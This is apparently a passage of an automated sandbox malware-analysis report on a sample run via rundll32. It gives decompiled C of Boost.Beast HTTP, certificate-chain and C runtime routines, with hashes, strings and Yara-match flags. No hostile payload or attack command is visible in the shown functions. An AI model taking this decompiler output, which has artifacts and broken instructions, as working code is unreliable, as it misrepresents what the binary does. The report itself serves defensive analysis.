                • Opcode Fuzzy Hash: cf9c549b1c476fdb4d5ff33ebff3ea372f693d11d334e207372d9e47b2696e50
                • Instruction Fuzzy Hash: 9831E273312E95C1D914AB65E40C2E9A661ABAABF0F5447619FBD077DDDA78E0428300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E000002152152059E930(long long __rbx, long long __rcx, void* __r9) {
                				void* __rbp;
                				void* _t36;
                				void* _t38;
                				void* _t44;
                				short _t52;
                				void* _t59;
                				intOrPtr* _t67;
                				long long _t71;
                				signed long long _t79;
                				long long _t88;
                				void* _t90;
                				void* _t91;
                				void* _t92;
                				void* _t93;
                				void* _t98;
                				void* _t100;
                				void* _t101;
                
                				_t98 = __r9;
                				_t92 = _t93 - 0x57;
                				 *((long long*)(_t92 + 7)) = 0xfffffffe;
                				 *((long long*)(_t93 - 0xc0 + 0xd0)) = __rbx;
                				_t71 = __rcx;
                				if ( *((intOrPtr*)(__rcx + 0x5c)) != 8) goto 0x2059e9f2;
                				if ( *((intOrPtr*)(__rcx + 0x70)) == 0) goto 0x2059e9f7;
                				 *((long long*)(_t92 - 0x39)) = 0x206278d0;
                				 *((long long*)(_t92 - 0x31)) = 0x206278d0;
                				 *((long long*)(_t92 - 0x29)) = 0x206278d0;
                				 *(_t92 - 0x49) = "invalid request body";
                				 *((char*)(_t92 - 0x41)) = 1;
                				E00000215215205F7764(__rcx, _t92 - 0x49, _t92 - 0x31, _t90, _t91);
                				 *((long long*)(_t92 - 0x39)) = 0x20627910;
                				 *((long long*)(_t92 - 0x39)) = 0x20627928;
                				 *((long long*)(_t92 - 0x19)) = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/message.hpp";
                				_t67 = "void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_constant<bool,1>)";
                				 *((long long*)(_t92 - 0x11)) = _t67;
                				 *((long long*)(_t92 - 9)) = 0x169;
                				_t96 = _t92 - 0x19;
                				E000002152152059FB40(__rcx, _t92 + 0xf, _t92 - 0x39, _t91, _t92 - 0x19);
                				_t36 = E00000215215205F9940(__rcx, _t92 + 0xf, 0x2066bac8, _t91);
                				if (0x2066bac8 != 0) goto 0x2059ea1f;
                				if (_t36 == 7) goto 0x2059ea1f;
                				if (_t36 == 5) goto 0x2059ea1f;
                				if (_t36 == 4) goto 0x2059ea1f;
                				E00000215215205A1B40(0, _t52, _t67, _t71, _t92 + 0xf, _t90, _t91, _t92 - 0x19, _t98, _t100, _t101);
                				_t38 = E00000215215205A2920(0x46, _t71, 0x2066bac8, _t92 - 0x19, _t98);
                				goto 0x2059eabc;
                				E00000215215205A2BF0(_t38, _t71, _t92 - 0x19, 0x2066bac8, _t90, _t91, _t92);
                				_t23 = _t67 + 8; // 0x8
                				_t79 = _t23;
                				_t88 =  *_t67;
                				 *(_t92 - 0x49) = _t79;
                				 *((long long*)(_t92 - 0x41)) = _t88;
                				asm("movaps xmm0, [ebp-0x49]");
                				asm("movdqa [ebp-0x49], xmm0");
                				_t69 =  *((intOrPtr*)( *[gs:0x58] + _t79 * 8));
                				_t59 =  *0x20683590 -  *((intOrPtr*)(_t88 +  *((intOrPtr*)( *[gs:0x58] + _t79 * 8)))); // 0x0
                				if (_t59 <= 0) goto 0x2059ea8a;
                				E00000215215205F53CC();
                				if ( *0x20683590 != 0xffffffff) goto 0x2059ea8a;
                				E0000021521520595A20( *((intOrPtr*)(_t88 +  *((intOrPtr*)( *[gs:0x58] + _t79 * 8)))),  *0x20683590 - 0xffffffff,  *((intOrPtr*)( *[gs:0x58] + _t79 * 8)), _t71, _t88, _t90, _t91, _t96, _t98, _t101);
                				E00000215215205F536C();
                				asm("movaps xmm0, [0xe4f9f]");
                				asm("movaps [ebp-0x39], xmm0");
                				E00000215215205A05E0(0x46, _t52, _t71, 0x20683590, _t92 - 0x39, _t92 - 0x49);
                				E00000215215205A08F0(_t44, _t71, _t71, _t69, _t90, _t91, _t100);
                				return E00000215215205A1B40(0, _t52, _t69, _t71, _t71, _t90, _t91, _t92 - 0x39, _t92 - 0x49, _t100, _t101);
                			}

                APIs
                Strings
                • D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp, xrefs: 000002152059E9B2
                • invalid request body, xrefs: 000002152059E97F
                • void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_, xrefs: 000002152059E9BD
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp$invalid request body$void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_
                • API String ID: 3608347590-3682780498
                • Opcode ID: ef42b276195ea1f7d67a054b94232194323117159da1f3a4f595506e7e5ee1e7
                • Instruction ID: 23f0c1dad963a9be23953da789a45d3d3ae324f74084bc968ce0a9ad5a92c430
                • Opcode Fuzzy Hash: ef42b276195ea1f7d67a054b94232194323117159da1f3a4f595506e7e5ee1e7
                • Instruction Fuzzy Hash: C9417B32702F64C9FB20DBA4E8883DC33B1BFA8748F544565DE4952AADEB38C555C780
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 45%
                			E00007FFA7FFA535EC0AC(void* __ecx, void* __edx, void* _a24, long long _a28, long long _a32, long long _a36, long long _a40, long long _a44, intOrPtr _a48) {
                				long long _v20;
                				long long _v24;
                				long long _v28;
                				long long _v32;
                				long long _v36;
                				long long _v40;
                				void* _v48;
                				signed long long _v56;
                				void* __rbx;
                				void* _t32;
                				void* _t33;
                				void* _t36;
                				long long _t45;
                				long long _t50;
                				signed long long _t52;
                				signed long long _t54;
                				void* _t60;
                				void* _t62;
                				void* _t63;
                
                				_t34 = __ecx;
                				asm("movsd [esp+0x20], xmm3");
                				asm("movsd [esp+0x18], xmm2");
                				_t52 = _t54;
                				r8d = 0;
                				if ( *0x53671ce0 == _t60) goto 0x535ec0e7;
                				r8d = r8d + 1;
                				if (0x7ffa53671cf0 - 0x53671eb0 < 0) goto 0x535ec0cc;
                				goto 0x535ec0f2;
                				_t45 =  *((intOrPtr*)(0x53671ce0 + 8 + (r8d + r8d) * 8));
                				 *((intOrPtr*)(_t45 - 0x7b)) =  *((intOrPtr*)(_t45 - 0x7b)) - __ecx;
                				 *(_t63 - 0x50 + _t52 * 2 - 0x75) =  *(_t63 - 0x50 + _t52 * 2 - 0x75) << 0x44;
                				_v40 = _t45;
                				_v36 = _a28;
                				_v32 = _a32;
                				_v28 = _a36;
                				_v24 = _a40;
                				_t50 = _a44;
                				_v20 = _t50;
                				_v56 = _t52;
                				E00007FFA7FFA535EC1A0(_t33, _t36, _t52, _a48, 0xffc0, _t62);
                				E00007FFA7FFA535EF8B8(_t33, _t52,  &_v56);
                				if (_t50 != 0) goto 0x535ec15d;
                				E00007FFA7FFA535EC07C(_t34, _t50, _t52);
                				asm("movsd xmm0, [esp+0x40]");
                				goto 0x535ec17a;
                				E00007FFA7FFA535EC1A0(_t33, _t36, _t52, _t52, 0xffc0, _t62);
                				_t32 = E00007FFA7FFA535EC07C(_t34, _t50, _t52);
                				asm("movsd xmm0, [esp+0x80]");
                				return _t32;
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_set_errno_from_matherr
                • String ID: exp
                • API String ID: 4230380726-113136155
                • Opcode ID: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction ID: 7f92bde535e805f478016e6247d36e16d9f3180c8d1306ddfc0597af4ff2a88e
                • Opcode Fuzzy Hash: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction Fuzzy Hash: DC21FC36A28B85CBE764DF28E44066A73A5FFCA740F54A135F68E92B55DE3CD4409F00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 40%
                			E0000021521520612EA4(char __ecx, void* __edx, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				long long _v48;
                				char _v56;
                				void* __rbx;
                				void* _t31;
                				char _t32;
                				void* _t38;
                				long long _t47;
                				void* _t48;
                				void* _t53;
                				void* _t54;
                
                				asm("movsd [esp+0x20], xmm3");
                				asm("movsd [esp+0x18], xmm2");
                				_push(_t48);
                				_t32 = __ecx;
                				r8d = 0;
                				if ( *0x20635b60 == __edx) goto 0x20612edf;
                				r8d = r8d + 1;
                				if (0x21520635b70 - 0x20635d30 < 0) goto 0x20612ec4;
                				goto 0x20612eea;
                				_t47 =  *((intOrPtr*)(0x20635b60 + 8 + (r8d + r8d) * 8));
                				_v48 = _t47;
                				if (_t47 == 0) goto 0x20612f5d;
                				_v40 = _a24;
                				_v36 = _a28;
                				_v32 = _a32;
                				_v28 = _a36;
                				_v24 = _a40;
                				_v20 = _a44;
                				_v56 = __ecx;
                				E0000021521520613178(__ecx, _t38, _t48, _a48, _t53, _t54);
                				_t52 =  &_v56;
                				if (E0000021521520614FB8(_t32, _t48,  &_v56) != 0) goto 0x20612f55;
                				E0000021521520612E74(_t32, _t47,  &_v56);
                				asm("movsd xmm0, [esp+0x40]");
                				goto 0x20612f72;
                				E0000021521520613178(_t32, _t38, _t48,  &_v56, _t53, _t54);
                				_t31 = E0000021521520612E74(_t32, _t47, _t52);
                				asm("movsd xmm0, [esp+0x80]");
                				return _t31;
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _ctrlfp_set_errno_from_matherr
                • String ID: exp
                • API String ID: 4230380726-113136155
                • Opcode ID: 1cc3016368783f852a81b867ecb1768de0bc5fcd9cde4a88de83dafe706250b5
                • Instruction ID: 790644a159b3ce59a537add811eef055e66643799c95bbdaa01848216dc55621
                • Opcode Fuzzy Hash: 1cc3016368783f852a81b867ecb1768de0bc5fcd9cde4a88de83dafe706250b5
                • Instruction Fuzzy Hash: 31213D37616A55CBDB70CF28E44529AB6B0FBE9740F604225FA8D82B5ADB38D8118F00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00000215215205A4240(long long __rbx, long long* __rcx, long long __rdx, void* _a8) {
                				char _v80;
                				char _v96;
                				long long _v112;
                				long long _v120;
                				char _v128;
                				long long _v136;
                				char _v144;
                				char _v152;
                				void* __rdi;
                				void* _t26;
                				void* _t27;
                				void* _t29;
                				void* _t30;
                				intOrPtr* _t47;
                				long long* _t54;
                				void* _t55;
                				void* _t56;
                				void* _t62;
                
                				_t62 = _t56;
                				 *((long long*)(_t62 - 0x58)) = 0xfffffffe;
                				 *((long long*)(_t62 + 8)) = __rbx;
                				_t54 = __rcx;
                				if (__rdx - 0x15 <= 0) goto 0x205a42fd;
                				_v152 = 0x206278d0;
                				_v144 = 0x206278d0;
                				_v136 = 0x206278d0;
                				 *((long long*)(_t62 - 0x68)) = "n > max_size()";
                				_v96 = 1;
                				E00000215215205F7764(__rdx, _t62 - 0x68,  &_v144, __rcx, _t55);
                				_v152 = 0x20627910;
                				_v152 = 0x20627940;
                				_v128 = "D:\\Sources\\boost_1_78_0\\boost/beast/core/impl/static_string.hpp";
                				_v120 = "void __cdecl boost::beast::static_string<21,char,struct std::char_traits<char> >::resize(unsigned __int64)";
                				_v112 = 0x1e6;
                				E000002152152059FCD0(__rdx,  &_v80,  &_v152, _t55,  &_v128);
                				_t47 =  &_v80;
                				E00000215215205F9940(__rdx, _t47, 0x2066b800, _t55);
                				_t40 =  *_t47;
                				if (__rdx -  *_t47 <= 0) goto 0x205a4319;
                				_t26 = E00000215215205F8EF0(_t27, 0, _t29, _t30, _t47 + 8 + _t40, 0x2066b800, _t54, __rdx - _t40);
                				 *_t54 = __rdx;
                				 *((char*)(__rdx + _t54 + 8)) = 0;
                				return _t26;
                			}


                APIs
                Strings
                • n > max_size(), xrefs: 00000215205A427F
                • void __cdecl boost::beast::static_string<21,char,struct std::char_traits<char> >::resize(unsigned __int64), xrefs: 00000215205A42C2
                • D:\Sources\boost_1_78_0\boost/beast/core/impl/static_string.hpp, xrefs: 00000215205A42B6
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                • String ID: D:\Sources\boost_1_78_0\boost/beast/core/impl/static_string.hpp$n > max_size()$void __cdecl boost::beast::static_string<21,char,struct std::char_traits<char> >::resize(unsigned __int64)
                • API String ID: 3608347590-1223756683
                • Opcode ID: 9955e44f8ce3896daec48110e685f0215b9124366ab22535fd92924e8c1757bd
                • Instruction ID: f3fe4e230c6f2e0ba569388f794fae4d12d9ca990f6f397695354161349db4c0
                • Opcode Fuzzy Hash: 9955e44f8ce3896daec48110e685f0215b9124366ab22535fd92924e8c1757bd
                • Instruction Fuzzy Hash: ED212A73206F90D5EB209B14F8883CA77A4FB94394F904266EA9D437A9EB3CC655C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 55%
                			E00000215215205B72D0(long long __rax, long long __rbx, long long __rcx, void* __rdx, long long _a8, long long _a16) {
                				long long _v16;
                				char _v24;
                				char _v32;
                				char _v40;
                				char _v48;
                				long long _v56;
                				void* __rdi;
                				long long _t35;
                				long long _t41;
                				void* _t52;
                
                				_t35 = __rax;
                				_a8 = __rcx;
                				_v56 = 0xfffffffe;
                				_a16 = __rbx;
                				_t41 = __rcx;
                				E00000215215205D19DC(0, __rcx);
                				 *((long long*)(_t41 + 8)) = _t35;
                				 *((char*)(_t41 + 0x10)) = 0;
                				 *((long long*)(_t41 + 0x18)) = _t35;
                				 *((char*)(_t41 + 0x20)) = 0;
                				 *((long long*)(_t41 + 0x28)) = _t35;
                				 *((short*)(_t41 + 0x30)) = 0;
                				 *((long long*)(_t41 + 0x38)) = _t35;
                				 *((short*)(_t41 + 0x40)) = 0;
                				 *((long long*)(_t41 + 0x48)) = _t35;
                				 *((char*)(_t41 + 0x50)) = 0;
                				 *((long long*)(_t41 + 0x58)) = _t35;
                				 *((char*)(_t41 + 0x60)) = 0;
                				if (__rdx != 0) goto 0x205b7380;
                				_v32 = 0x206278d0;
                				_v24 = 0x206278d0;
                				_v16 = 0x206278d0;
                				_v48 = "bad locale name";
                				_v40 = 1;
                				E00000215215205F7764(_t41,  &_v48,  &_v24, __rdx, _t52);
                				_v32 = 0x20627970;
                				E00000215215205F9940(_t41,  &_v32, 0x2066bb38, _t52);
                				asm("int3");
                				return E00000215215205D6E2C(0x20627970, _t41, _t41, __rdx);
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exceptionstd::_$FileHeaderLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__std_exception_copy
                • String ID: bad locale name
                • API String ID: 1909641974-1405518554
                • Opcode ID: cd7e34b31d0c2e87ad5880a43c03d9ed14a9b9dfccdb81bf2bb5eda750aecf7e
                • Instruction ID: 0ee75a2e21b25fd9c1451d705c0dcce08968486148ea34bb281cc42057d21f7a
                • Opcode Fuzzy Hash: cd7e34b31d0c2e87ad5880a43c03d9ed14a9b9dfccdb81bf2bb5eda750aecf7e
                • Instruction Fuzzy Hash: 1F216F33206F80C9C750DF24F88428977B5FBA9BA4F245265EA9C8376DEB38C594C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E00000215215205996A0(long long __rbx, char* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8) {
                				void* _v8;
                				long long _v24;
                				intOrPtr _v88;
                				void* __rdi;
                				void* _t20;
                				long _t21;
                				void* _t22;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				void* _t38;
                				char* _t50;
                				void* _t52;
                				long long _t55;
                				void* _t57;
                				void* _t60;
                
                				_t46 = __rdx;
                				_t39 = __rbx;
                				_t38 = _t57;
                				 *((long long*)(_t38 - 0x68)) = 0xfffffffe;
                				 *((long long*)(_t38 + 0x10)) = __rbx;
                				 *((long long*)(_t38 + 0x18)) = __rbp;
                				 *((long long*)(_t38 + 0x20)) = __rsi;
                				_t52 = __rdx;
                				_t50 = __rcx;
                				_t55 =  *((intOrPtr*)(__rcx + 0x58));
                				if (_t55 == 0) goto 0x2059974e;
                				_t6 = _t46 + 0x50; // 0x50
                				r8d = _t6;
                				_t20 = E00000215215205F8EF0(_t29, 0, _t31, _t32, _t38 - 0x58, __rdx, __rcx, _t60);
                				_v88 = 0x50;
                				_v24 = _t55;
                				_a8 = 0;
                				__imp__CertCreateCertificateChainEngine();
                				if (_t20 != 0) goto 0x2059972a;
                				_t21 = GetLastError();
                				__imp__CertFreeCertificateChainEngine();
                				goto 0x20599760;
                				_t22 = E00000215215205997A0(_t21, __rbx, _a8, __rdx, _t50, _a8);
                				__imp__CertFreeCertificateChainEngine();
                				if (_t22 == 0) goto 0x20599760;
                				if ( *_t50 == 0) goto 0x20599760;
                				r8d = 0;
                				return E00000215215205997A0(_t22, _t39, _a8, _t52, _t50, _a8);
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CertCertificateChainEngine$Free$CreateErrorLast
                • String ID: P
                • API String ID: 2119563119-3110715001
                • Opcode ID: f79cfe4300ef73199386e7bb36637cad025c75a79c11fe12d50f381a4ed2e88c
                • Instruction ID: aedbd947e8aab84f15a88f3cc7368ae23f1558fcb278909f7daa06b540db944f
                • Opcode Fuzzy Hash: f79cfe4300ef73199386e7bb36637cad025c75a79c11fe12d50f381a4ed2e88c
                • Instruction Fuzzy Hash: 16215E73325E94CAEB608F69E48878E23A5FBD5F90F144261DE5843799DF38C805CB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			E000002152152059EB90(intOrPtr __edx) {
                				char _v80;
                				long long _v88;
                				char _v96;
                				char _v104;
                				long long _v112;
                				long long _v120;
                				char _v128;
                				long long _v136;
                				char _v144;
                				char _v152;
                				void* _t22;
                				intOrPtr _t23;
                				void* _t32;
                				char* _t35;
                				void* _t39;
                				void* _t40;
                
                				_t23 = __edx;
                				_v88 = 0xfffffffe;
                				if (__edx - 0x3e7 <= 0) goto 0x2059ec44;
                				_v152 = 0x206278d0;
                				_v144 = 0x206278d0;
                				_v136 = 0x206278d0;
                				_v104 = "invalid status-code";
                				_v96 = 1;
                				E00000215215205F7764(_t32,  &_v104,  &_v144, _t39, _t40);
                				_v152 = 0x20627910;
                				_v152 = 0x20627928;
                				_v128 = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/message.hpp";
                				_v120 = "void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)";
                				_v112 = 0x8b;
                				E000002152152059FB40(_t32,  &_v80,  &_v152, _t40,  &_v128);
                				_t35 =  &_v80;
                				_t22 = E00000215215205F9940(_t32, _t35, 0x2066bac8, _t40);
                				 *((intOrPtr*)(_t35 + 0x5c)) = _t23;
                				return _t22;
                			}


                APIs
                Strings
                • D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp, xrefs: 000002152059EBFD
                • invalid status-code, xrefs: 000002152059EBC4
                • void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int), xrefs: 000002152059EC09
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp$invalid status-code$void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)
                • API String ID: 3608347590-1062302746
                • Opcode ID: 044baebbdb73662a108632ded4ef622990c8f6eb39cf9fb03145086468f8e6ab
                • Instruction ID: 21dfbe7e2b1d5f19e0e10009caa82fe560660af4798e229e1933e157f357f360
                • Opcode Fuzzy Hash: 044baebbdb73662a108632ded4ef622990c8f6eb39cf9fb03145086468f8e6ab
                • Instruction Fuzzy Hash: 0E11E932206F91D5DB60DB44F4843CAB7A4FBD4364F905266E6DC42BA8EB7CC259CB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction ID: 4179510b56d69c6193ada976ec2268c1f94c609e12c43dd7f7d25d74ae170532
                • Opcode Fuzzy Hash: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction Fuzzy Hash: 6DF04F61A39F4285EF449B61F4842792366EFCA790F4CA43AD94F96664DE3CD488C700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: e9e8d7fb16d73e31bfa742ca577ae93c05d2f0ff201ae8e943ab334c9cf564bb
                • Instruction ID: 992e5ecc9129905d11aa2d3ce8dc5879b631493bba1ee2bc75af0bfe473280bb
                • Opcode Fuzzy Hash: e9e8d7fb16d73e31bfa742ca577ae93c05d2f0ff201ae8e943ab334c9cf564bb
                • Instruction Fuzzy Hash: 32F062B3222E51C1EF649B51F4987E963A1FFE8B90F685065AD0B46668DF3CD488C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 56%
                			E00007FFA7FFA535F37AC(signed long long __ebx, signed long long __esi, intOrPtr* __rcx, long long __rdx, intOrPtr* __r9) {
                				void* __rbx;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				signed int _t65;
                				int _t67;
                				void* _t69;
                				void* _t74;
                				void* _t76;
                				intOrPtr _t77;
                				intOrPtr _t78;
                				signed long long _t133;
                				signed long long _t134;
                				intOrPtr* _t140;
                				intOrPtr* _t142;
                				signed long long _t143;
                				signed long long _t156;
                				long long* _t157;
                				signed long long _t165;
                				signed long long _t166;
                				signed long long _t167;
                				signed long long _t168;
                				long long* _t189;
                				signed long long _t194;
                				int _t198;
                				void* _t199;
                				void* _t200;
                				void* _t201;
                				void* _t202;
                				void* _t209;
                				void* _t213;
                				void* _t214;
                				long long _t215;
                				intOrPtr* _t217;
                
                				_t200 = _t199 - 0x88;
                				_t198 = _t200 + 0x50;
                				_t133 =  *0x53754140; // 0x3c63485c5c92
                				_t134 = _t133 ^ _t198;
                				 *(_t198 + 0x28) = _t134;
                				r12d = 0;
                				_t217 =  *((intOrPtr*)(_t198 + 0xa8));
                				 *_t198 = r8d;
                				 *((long long*)(_t198 + 8)) = __rdx;
                				if ( *((intOrPtr*)(_t198 + 0xa0)) <= 0) goto 0x535f381f;
                				E00007FFA7FFA535F3620(_t134, __r9,  *((intOrPtr*)(_t198 + 0xa0)));
                				_t156 = _t134;
                				if ( *((intOrPtr*)(_t198 + 0xb0)) <= 0) goto 0x535f382b;
                				_t65 = E00007FFA7FFA535F3620(_t134, _t217,  *((intOrPtr*)(_t198 + 0xb0)));
                				_t194 = _t134;
                				goto 0x535f3830;
                				if (_t156 - 0xffffffff >= 0) goto 0x535f3804;
                				goto 0x535f3b21;
                				if (_t194 - 0xffffffff < 0) goto 0x535f3824;
                				r14d =  *((intOrPtr*)(_t198 + 0xb8));
                				if (r14d != 0) goto 0x535f3843;
                				r14d =  *((intOrPtr*)( *__rcx + 0xc));
                				if (_t194 != 0) goto 0x535f38ef;
                				if (_t156 != _t194) goto 0x535f3862;
                				 *_t156 =  *_t156 + dil;
                				goto 0x535f3b21;
                				if (_t156 - 0x1 <= 0) goto 0x535f387b;
                				 *0x2A6E8FFFFFF90 =  *((intOrPtr*)(0x2a6e8ffffff90)) + _t76;
                				asm("adc [ecx-0x75], al");
                				asm("into");
                				_t67 = GetCPInfo(_t198);
                				if (0x3 == 0) goto 0x535f3824;
                				if (_t156 <= 0) goto 0x535f38bb;
                				if ( *((long long*)(_t198 + 0x10)) - 2 < 0) goto 0x535f3871;
                				_t140 = _t198 + 0x16;
                				if ( *((intOrPtr*)(_t198 + 0x16)) == r12b) goto 0x535f3871;
                				if ( *((intOrPtr*)(_t140 + 1)) == r12b) goto 0x535f3871;
                				_t77 =  *__r9;
                				if (_t77 -  *_t140 < 0) goto 0x535f38b2;
                				if (_t77 -  *((intOrPtr*)(_t140 + 1)) <= 0) goto 0x535f3858;
                				goto 0x535f389e;
                				if (_t194 <= 0) goto 0x535f38ef;
                				if ( *((long long*)(_t198 + 0x10)) - 2 < 0) goto 0x535f3866;
                				_t142 = _t198 + 0x16;
                				if ( *((intOrPtr*)(_t198 + 0x16)) == r12b) goto 0x535f3866;
                				if ( *((intOrPtr*)(_t142 + 1)) == r12b) goto 0x535f3866;
                				_t78 =  *_t217;
                				if (_t78 -  *_t142 < 0) goto 0x535f38e6;
                				if (_t78 -  *((intOrPtr*)(_t142 + 1)) <= 0) goto 0x535f3858;
                				_t143 = _t142 + 2;
                				goto 0x535f38cd;
                				 *(_t200 + 0x28) = r12d;
                				r9d = __ebx;
                				 *((long long*)(_t200 + 0x20)) = _t215;
                				asm("adc eax, 0x886b");
                				if (_t143 == 0) goto 0x535f3824;
                				_t181 = _t67 + _t67;
                				_t29 = _t181 + 0x10; // 0x10
                				asm("dec eax");
                				if ((_t29 & _t143) == 0) goto 0x535f39a9;
                				_t32 = _t181 + 0x10; // 0x10
                				_t165 = _t32;
                				asm("dec eax");
                				_t33 = _t181 + 0x10; // 0x10
                				if ((_t143 & _t165) - 0x400 > 0) goto 0x535f3987;
                				asm("dec eax");
                				_t166 = _t165 & _t33;
                				_t34 = _t166 + 0xf; // 0x1f
                				if (_t34 - _t166 > 0) goto 0x535f3965;
                				E00007FFA7FFA535F54B0(_t78, 0xffffffffffffff0, _t166, _t67 + _t67, 0xfffffff0, _t213, _t214);
